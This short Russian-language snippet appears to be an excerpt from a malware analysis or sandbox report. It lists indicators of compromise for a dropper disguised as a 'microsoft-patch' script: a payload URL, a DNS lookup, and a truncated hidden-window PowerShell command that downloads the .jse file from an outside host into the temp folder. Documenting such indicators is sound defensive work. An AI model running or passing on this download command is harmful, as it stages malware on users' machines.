Техническая информация
- http+s://ix5gunextmd.net/54147581577396/1519523626175373/microsoft-patch.jse как $d
- DNS ASK ix###nextmd.net
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1630192565086.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://ix5gunextmd.net/54147581577396/1519523626175373/microsoft-patch.jse...' (со скрытым окном)